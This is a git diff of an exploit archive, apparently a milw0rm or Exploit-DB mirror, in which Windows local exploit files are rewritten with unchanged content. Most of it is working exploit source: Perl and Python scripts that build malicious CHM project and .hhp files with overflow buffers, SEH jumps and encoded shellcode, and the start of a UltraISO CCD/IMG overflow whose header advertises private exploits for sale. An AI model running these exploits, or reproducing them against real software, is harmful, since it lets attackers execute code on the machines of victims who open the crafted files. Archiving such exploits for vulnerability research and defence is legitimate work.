+' <param name="UseTabHeader">0</param>\n'
+' <param name="MaxKeyLength">32</param>\n'
+' <param name="LiveUpdate">0</param>\n'
+'</group>\n'
+'<group name="Customize">\n'
+' <param name="MainTitle">kkkkkkkkkkkkkkk</param>\n'
+' <param name="DefaultPage"></param>\n'
+' <param name="Left">0</param>\n'
+' <param name="Top">0</param>\n'
+' <param name="Width">0</param>\n'
+' <param name="Heigth">0</param>\n'
+' <param name="HideShow">1</param>\n'
+' <param name="Back">1</param>\n'
+' <param name="Forward">1</param>\n'
+' <param name="Stop">0</param>\n'
+' <param name="Refresh">0</param>\n'
+' <param name="Options">1</param>\n'
+' <param name="Print">1</param>\n'
+' <param name="Font">0</param>\n'
+' <param name="Locate">0</param>\n'
+' <param name="Home">0</param>\n'
+' <param name="HomePage"></param>\n'
+' <param name="Jump1">0</param>\n'
+' <param name="Jump1Page"></param>\n'
+' <param name="Jump1Title"></param>\n'
+' <param name="Jump2">0</param>\n'
+' <param name="Jump2Page"></param>\n'
+' <param name="Jump2Title"></param>\n'
+' <param name="Search">1</param>\n'
+' <param name="AdditionalFiles"></param>\n'
+'</group>\n'
+'</XMLConfig>\n'
+)
+
+
+file=open('Devil_Inside.cmp','w')
+file.write(header1+header2)
+file.close()
+
+# milw0rm.com [2009-03-27]
diff --git a/platforms/windows/local/8301.pl b/platforms/windows/local/8301.pl
index a7c949b67..b8c115141 100755
--- a/platforms/windows/local/8301.pl
+++ b/platforms/windows/local/8301.pl
@@ -1,58 +1,58 @@
-#!/usr/bin/perl
-#
-# Title: PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit
-#
-# Summary: With PowerCHM you can create your CHM files
-# automatically from Html Files (including .htm, .html
-# and .mht), Text Files (.txt), Microsoft Word Documents
-# (.doc) and Adobe Acrobat Document (.pdf).
-#
-# Product web page: http://www.dawningsoft.com/products/powerchm.htm
-#
-# Tested on WinXP Pro SP2 (English)
-#
-# Refs:	http://www.milw0rm.com/exploits/8300
-#	http://security.biks.vn/?p=365
-#
-# Exploit by Gjoko 'LiquidWorm' Krstic
-#
-# liquidworm gmail com
-#
-# http://www.zeroscience.org/
-#
-# 28.03.2009
-#
-
-my $header="
-	[OPTIONS]\n
-	Compatibility=1.1 or later\n
-	Compiled file=zero.chm\n
-	Contents file=science.hhc\n
-	Index file=lqwrm.hhk\n
-	Binary Index=Yes\n
-	Language=0x042F\n
-	Title=\n
-	Error log file=Errlog.txt\n
-	Default Window=main\n\n
-	[WINDOWS]\n
-	main='',science.hhc,lqwrm.hhk,'','',,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0\n\n
-	[FILES]\n\n
-	[INFOTYPES]\n
-	";
-
-
-my $sc ="\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45".
-	"\xFD\x6D\xC6\x45\xFE\x64\xC6\x45\xF8\x01\x8D".
-	"\x45\xFC\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";
-
-
-my $bof = "\x90" x 568 . "$sc" . "\x41" x 400 . "\xe8\xed\x12\x00" . "\x42" x 500;
-
-my $file = "Watchmen.hhp";
-open (hhp, ">./$file") || die "\nCan't open $file: $!";
-print hhp "$header" . "$bof";
-close (hhp);
-sleep 1;
-print "\nFile $file successfully created!\n";
-
-# milw0rm.com [2009-03-29]
+#!/usr/bin/perl
+#
+# Title: PowerCHM 5.7 (hhp) Local Buffer Overflow Exploit
+#
+# Summary: With PowerCHM you can create your CHM files
+# automatically from Html Files (including .htm, .html
+# and .mht), Text Files (.txt), Microsoft Word Documents
+# (.doc) and Adobe Acrobat Document (.pdf).
+#
+# Product web page: http://www.dawningsoft.com/products/powerchm.htm
+#
+# Tested on WinXP Pro SP2 (English)
+#
+# Refs:	http://www.milw0rm.com/exploits/8300
+#	http://security.biks.vn/?p=365
+#
+# Exploit by Gjoko 'LiquidWorm' Krstic
+#
+# liquidworm gmail com
+#
+# http://www.zeroscience.org/
+#
+# 28.03.2009
+#
+
+my $header="
+	[OPTIONS]\n
+	Compatibility=1.1 or later\n
+	Compiled file=zero.chm\n
+	Contents file=science.hhc\n
+	Index file=lqwrm.hhk\n
+	Binary Index=Yes\n
+	Language=0x042F\n
+	Title=\n
+	Error log file=Errlog.txt\n
+	Default Window=main\n\n
+	[WINDOWS]\n
+	main='',science.hhc,lqwrm.hhk,'','',,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0\n\n
+	[FILES]\n\n
+	[INFOTYPES]\n
+	";
+
+
+my $sc ="\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45".
+	"\xFD\x6D\xC6\x45\xFE\x64\xC6\x45\xF8\x01\x8D".
+	"\x45\xFC\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";
+
+
+my $bof = "\x90" x 568 . "$sc" . "\x41" x 400 . "\xe8\xed\x12\x00" . "\x42" x 500;
+
+my $file = "Watchmen.hhp";
+open (hhp, ">./$file") || die "\nCan't open $file: $!";
+print hhp "$header" . "$bof";
+close (hhp);
+sleep 1;
+print "\nFile $file successfully created!\n";
+
+# milw0rm.com [2009-03-29]
diff --git a/platforms/windows/local/8311.py b/platforms/windows/local/8311.py
index afdea202c..4e3cbb86e 100755
--- a/platforms/windows/local/8311.py
+++ b/platforms/windows/local/8311.py
@@ -1,100 +1,100 @@
-# exploit.py
-# Abee Chm eBook Creator 2.11 Stack overflow Exploit
-# By:Encrypt3d.M!nd
-#
-# it's the same exploit i wrote for chm maker,everything is the same!!
-# but there's a lil note that when importing 'Devil_Inside.chmprj' a message
-# will pops up and tells that the project file format is outdated bla bla but after clicking
-# ok it will load into the program,and just go to File>Make Ebook.. and calc
-# p.s:you can avoid the message by using chm ebook project data,i'm lazy to do that
-# so i've used the chm maker one :D
-
-ns = "\xEB\x06\x90\x90"
-sh = "\x05\x67\x35\x45"
-
-shellcode = (
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
-"\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
-"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x71\x32\x42\x42\x42\x32"
-"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x4d"
-"\x38\x43\x74\x35\x50\x53\x30\x77\x70\x4e\x6b\x53\x75\x77\x4c\x4c"
-"\x4b\x63\x4c\x54\x45\x34\x38\x67\x71\x5a\x4f\x6c\x4b\x62\x6f\x75"
-"\x48\x6e\x6b\x41\x4f\x47\x50\x33\x31\x58\x6b\x63\x79\x4e\x6b\x36"
-"\x54\x4c\x4b\x45\x51\x68\x6e\x34\x71\x59\x50\x4c\x59\x4c\x6c\x4f"
-"\x74\x6f\x30\x72\x54\x47\x77\x58\x41\x39\x5a\x34\x4d\x57\x71\x69"
-"\x52\x48\x6b\x69\x64\x67\x4b\x46\x34\x66\x44\x74\x44\x53\x45\x6b"
-"\x55\x4c\x4b\x43\x6f\x31\x34\x67\x71\x78\x6b\x63\x56\x4c\x4b\x54"
-"\x4c\x62\x6b\x6e\x6b\x31\x4f\x67\x6c\x37\x71\x78\x6b\x4c\x4b\x45"
-"\x4c\x4c\x4b\x73\x31\x4a\x4b\x6c\x49\x51\x4c\x74\x64\x67\x74\x6b"
-"\x73\x34\x71\x6f\x30\x42\x44\x6c\x4b\x71\x50\x34\x70\x4e\x65\x4f"
-"\x30\x62\x58\x46\x6c\x6c\x4b\x41\x50\x44\x4c\x4c\x4b\x42\x50\x65"
-"\x4c\x4e\x4d\x6e\x6b\x50\x68\x34\x48\x4a\x4b\x73\x39\x6e\x6b\x4b"
-"\x30\x4c\x70\x57\x70\x63\x30\x37\x70\x4e\x6b\x42\x48\x57\x4c\x51"
-"\x4f\x56\x51\x48\x76\x31\x70\x73\x66\x6e\x69\x59\x68\x4e\x63\x4f"
-"\x30\x73\x4b\x66\x30\x65\x38\x68\x70\x6d\x5a\x34\x44\x51\x4f\x30"
-"\x68\x4e\x78\x4b\x4e\x6c\x4a\x54\x4e\x32\x77\x79\x6f\x79\x77\x41"
-"\x73\x75\x31\x72\x4c\x41\x73\x57\x70\x61")
-
-header1 = (
-'<?xml version="1.0" encoding="Windows-1252" ?>\n'
-'<XMLConfig><info>Chm Maker project</info>\n'
-'<group name="Contents">\n'
-' <group name="0">\n'
-'  <param name="Caption">filename</param>\n'
-'  <param name="Level">0</param>\n'
-'  <param name="FileName">'+"\x41"*320+ns+sh+"\x90"*20+shellcode+"\x41" * 5000)
-
-header2 = (
-'</param>\n'
-' </group>\n'
-' <param name="Count">1</param>\n'
-'</group>\n'
-'<group name="Keywords">\n'
-' <param name="Count">0</param>\n'
-'</group>\n'
-'<group name="KeywordsFinder">\n'
-' <param name="UseMeta">1</param>\n'
-' <param name="UseBold">1</param>\n'
-' <param name="UseItalic">0</param>\n'
-' <param name="UseUnder">0</param>\n'
-' <param name="UseHTag">1</param>\n'
-' <param name="UseTabHeader">0</param>\n'
-' <param name="MaxKeyLength">32</param>\n'
-' <param name="LiveUpdate">0</param>\n'
-'</group>\n'
-'<group name="Customize">\n'
-' <param name="MainTitle">kkkkkkkkkkkkkkk</param>\n'
-' <param name="DefaultPage"></param>\n'
-' <param name="Left">0</param>\n'
-' <param name="Top">0</param>\n'
-' <param name="Width">0</param>\n'
-' <param name="Heigth">0</param>\n'
-' <param name="HideShow">1</param>\n'
-' <param name="Back">1</param>\n'
-' <param name="Forward">1</param>\n'
-' <param name="Stop">0</param>\n'
-' <param name="Refresh">0</param>\n'
-' <param name="Options">1</param>\n'
-' <param name="Print">1</param>\n'
-' <param name="Font">0</param>\n'
-' <param name="Locate">0</param>\n'
-' <param name="Home">0</param>\n'
-' <param name="HomePage"></param>\n'
-' <param name="Jump1">0</param>\n'
-' <param name="Jump1Page"></param>\n'
-' <param name="Jump1Title"></param>\n'
-' <param name="Jump2">0</param>\n'
-' <param name="Jump2Page"></param>\n'
-' <param name="Jump2Title"></param>\n'
-' <param name="Search">1</param>\n'
-' <param name="AdditionalFiles"></param>\n'
-'</group>\n'
-'</XMLConfig>\n'
-)
-
-
-file=open('Devil_Inside.chmprj','w')
-file.write(header1+header2)
-file.close()
-
-# milw0rm.com [2009-03-30]
+# exploit.py
+# Abee Chm eBook Creator 2.11 Stack overflow Exploit
+# By:Encrypt3d.M!nd
+#
+# it's the same exploit i wrote for chm maker,everything is the same!!
+# but there's a lil note that when importing 'Devil_Inside.chmprj' a message
+# will pops up and tells that the project file format is outdated bla bla but after clicking
+# ok it will load into the program,and just go to File>Make Ebook.. and calc
+# p.s:you can avoid the message by using chm ebook project data,i'm lazy to do that
+# so i've used the chm maker one :D
+
+ns = "\xEB\x06\x90\x90"
+sh = "\x05\x67\x35\x45"
+
+shellcode = (
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
+"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x71\x32\x42\x42\x42\x32"
+"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x4d"
+"\x38\x43\x74\x35\x50\x53\x30\x77\x70\x4e\x6b\x53\x75\x77\x4c\x4c"
+"\x4b\x63\x4c\x54\x45\x34\x38\x67\x71\x5a\x4f\x6c\x4b\x62\x6f\x75"
+"\x48\x6e\x6b\x41\x4f\x47\x50\x33\x31\x58\x6b\x63\x79\x4e\x6b\x36"
+"\x54\x4c\x4b\x45\x51\x68\x6e\x34\x71\x59\x50\x4c\x59\x4c\x6c\x4f"
+"\x74\x6f\x30\x72\x54\x47\x77\x58\x41\x39\x5a\x34\x4d\x57\x71\x69"
+"\x52\x48\x6b\x69\x64\x67\x4b\x46\x34\x66\x44\x74\x44\x53\x45\x6b"
+"\x55\x4c\x4b\x43\x6f\x31\x34\x67\x71\x78\x6b\x63\x56\x4c\x4b\x54"
+"\x4c\x62\x6b\x6e\x6b\x31\x4f\x67\x6c\x37\x71\x78\x6b\x4c\x4b\x45"
+"\x4c\x4c\x4b\x73\x31\x4a\x4b\x6c\x49\x51\x4c\x74\x64\x67\x74\x6b"
+"\x73\x34\x71\x6f\x30\x42\x44\x6c\x4b\x71\x50\x34\x70\x4e\x65\x4f"
+"\x30\x62\x58\x46\x6c\x6c\x4b\x41\x50\x44\x4c\x4c\x4b\x42\x50\x65"
+"\x4c\x4e\x4d\x6e\x6b\x50\x68\x34\x48\x4a\x4b\x73\x39\x6e\x6b\x4b"
+"\x30\x4c\x70\x57\x70\x63\x30\x37\x70\x4e\x6b\x42\x48\x57\x4c\x51"
+"\x4f\x56\x51\x48\x76\x31\x70\x73\x66\x6e\x69\x59\x68\x4e\x63\x4f"
+"\x30\x73\x4b\x66\x30\x65\x38\x68\x70\x6d\x5a\x34\x44\x51\x4f\x30"
+"\x68\x4e\x78\x4b\x4e\x6c\x4a\x54\x4e\x32\x77\x79\x6f\x79\x77\x41"
+"\x73\x75\x31\x72\x4c\x41\x73\x57\x70\x61")
+
+header1 = (
+'<?xml version="1.0" encoding="Windows-1252" ?>\n'
+'<XMLConfig><info>Chm Maker project</info>\n'
+'<group name="Contents">\n'
+' <group name="0">\n'
+'  <param name="Caption">filename</param>\n'
+'  <param name="Level">0</param>\n'
+'  <param name="FileName">'+"\x41"*320+ns+sh+"\x90"*20+shellcode+"\x41" * 5000)
+
+header2 = (
+'</param>\n'
+' </group>\n'
+' <param name="Count">1</param>\n'
+'</group>\n'
+'<group name="Keywords">\n'
+' <param name="Count">0</param>\n'
+'</group>\n'
+'<group name="KeywordsFinder">\n'
+' <param name="UseMeta">1</param>\n'
+' <param name="UseBold">1</param>\n'
+' <param name="UseItalic">0</param>\n'
+' <param name="UseUnder">0</param>\n'
+' <param name="UseHTag">1</param>\n'
+' <param name="UseTabHeader">0</param>\n'
+' <param name="MaxKeyLength">32</param>\n'
+' <param name="LiveUpdate">0</param>\n'
+'</group>\n'
+'<group name="Customize">\n'
+' <param name="MainTitle">kkkkkkkkkkkkkkk</param>\n'
+' <param name="DefaultPage"></param>\n'
+' <param name="Left">0</param>\n'
+' <param name="Top">0</param>\n'
+' <param name="Width">0</param>\n'
+' <param name="Heigth">0</param>\n'
+' <param name="HideShow">1</param>\n'
+' <param name="Back">1</param>\n'
+' <param name="Forward">1</param>\n'
+' <param name="Stop">0</param>\n'
+' <param name="Refresh">0</param>\n'
+' <param name="Options">1</param>\n'
+' <param name="Print">1</param>\n'
+' <param name="Font">0</param>\n'
+' <param name="Locate">0</param>\n'
+' <param name="Home">0</param>\n'
+' <param name="HomePage"></param>\n'
+' <param name="Jump1">0</param>\n'
+' <param name="Jump1Page"></param>\n'
+' <param name="Jump1Title"></param>\n'
+' <param name="Jump2">0</param>\n'
+' <param name="Jump2Page"></param>\n'
+' <param name="Jump2Title"></param>\n'
+' <param name="Search">1</param>\n'
+' <param name="AdditionalFiles"></param>\n'
+'</group>\n'
+'</XMLConfig>\n'
+)
+
+
+file=open('Devil_Inside.chmprj','w')
+file.write(header1+header2)
+file.close()
+
+# milw0rm.com [2009-03-30]
diff --git a/platforms/windows/local/833.cpp b/platforms/windows/local/833.cpp
index 9d7498df0..275a25f88 100755
--- a/platforms/windows/local/833.cpp
+++ b/platforms/windows/local/833.cpp
@@ -154,6 +154,6 @@ int main(void)
 
        return 0;
 
-}
-
-// milw0rm.com [2005-02-22]
+}
+
+// milw0rm.com [2005-02-22]
diff --git a/platforms/windows/local/834.c b/platforms/windows/local/834.c
index 55eff95b3..ef0ad8957 100755
--- a/platforms/windows/local/834.c
+++ b/platforms/windows/local/834.c
@@ -79,6 +79,6 @@ int main()
    }
 
        return 0;
-}
-
-// milw0rm.com [2005-02-22]
+}
+
+// milw0rm.com [2005-02-22]
diff --git a/platforms/windows/local/8343.pl b/platforms/windows/local/8343.pl
index 197f2a197..53fecc509 100755
--- a/platforms/windows/local/8343.pl
+++ b/platforms/windows/local/8343.pl
@@ -1,2608 +1,2608 @@
-#!/usr/bin/perl
-#
-# UltraISO <= 9.3.3.2685 CCD/IMG Universal Buffer Overflow Exploit
-# ----------------------------------------------------------------
-# Discovered and Exploited by SkD             (skdrat@hotmail.com)
-#
-# A nice exploit for this software that was just recently
-# patched after a few other discoveries in it.
-# This is 0day at the moment and is very reliable.
-#
-# Just open either file CCD or IMG in UltraISO :).
-#
-# Another note is that the CCD will also cause an access violation
-# in MagicISO.
-#
-# Private exploits for sale, contact me at (skdrat@hotmail.com).
-#
-# WARNING: Author has no responsibility over the damage done
-# with this!
-use strict;
-use warnings;
-
-my $img_data1 = "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
